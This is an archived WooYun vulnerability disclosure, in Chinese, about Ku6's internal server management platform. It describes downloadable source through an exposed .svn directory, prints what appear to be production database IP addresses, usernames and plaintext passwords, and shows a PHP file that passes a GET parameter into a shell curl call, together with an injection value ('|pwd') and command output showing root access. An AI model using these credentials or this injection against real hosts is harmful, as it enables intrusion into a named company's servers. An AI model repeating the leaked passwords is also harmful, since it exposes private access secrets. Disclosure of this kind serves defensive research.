乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-27: 细节已通知厂商并且等待厂商处理中 2015-01-01: 厂商已经主动忽略漏洞,细节向公众公开
酷6网服务器统一管理平台源码泄露(进而引发命令执行漏洞)
可直接下载整站源码http://fixedassets.ku6.cn/.svn/entries
进行源码分析发现这是一台非常敏感的服务器,配置服务器用的
function server_group_assign() //批量分配服务器 { require './inc_check_permit.php'; if (!isPermitted("server_op")) { $this->window_alert("无此操作权限"); return false; } $fixed = __post('fixed'); if(empty($fixed)){ $this->window_alert('请选择你要分配的服务器!'); return false; } $server_array = array(); //var_dump($fixed);exit(); foreach($fixed as $k=>$v){ $server_id = $k; $server_array[] = $k; $business_id = $v['business_id']; $this->validate($business_id, 'not_zero', null, '编号为【'.$k.'】的服务器:业务必须填写'); $sub_business_id = $v['sub_business_id']; $this->validate($sub_business_id, 'not_zero', null, '编号为【'.$k.'】的服务器:子业务必须填写'); $depart = $v['depart']; $this->validate($depart, 'not_zero', null, '编号为【'.$k.'】的服务器:所属部门必须填写'); $person = $v['person']; $this->validate($person, 'not_zero', null, '编号为【'.$k.'】的服务器:所属部门责任人必须填写'); $supporter = $v['supporter']; $this->validate($supporter, 'not_zero', null, '编号为【'.$k.'】的服务器:联系人必须填写'); $backup_supporter = $v['backup_supporter']; $this->validate($backup_supporter, 'not_zero', null, '编号为【'.$k.'】的服务器:备份联系人必须填写'); }
#3 某附件直接存放了生产服务器的密码
http://fixedassets.ku6.cn/config_check_list.php 各种敏感信息
$res = real_mysql_query($sql, '125.76.238.232', 'itil', 'Itil', 'storage_cluster', 3306);$res = real_mysql_query($sql, '203.187.170.74', 'root', 'dogoicq', 'itil', 3305);
# 代码执行漏洞在这里CdnDeleveMdfy.php
<?#####生效$cdnid=$_GET['cdnid'];if ($_GET['reload']){ $OK1=`curl -is "http://59.151.119.26:8080/cmd/4?cdnid=$cdnid"`; echo nl2br($OK1);}?>
传入 reload=1 & cdnid=99999"|pwd 就执行命令了
$uname -aLinux server.oss.com 2.6.18-128.el5 #1 SMP Wed Jan 21 10:41:14 EST 2009 x86_64$pwd/data/WWW/itil/htdocs$whoamiroot
更改配置
危害等级:无影响厂商忽略
忽略时间:2015-01-01 02:02
漏洞Rank:15 (WooYun评价)
暂无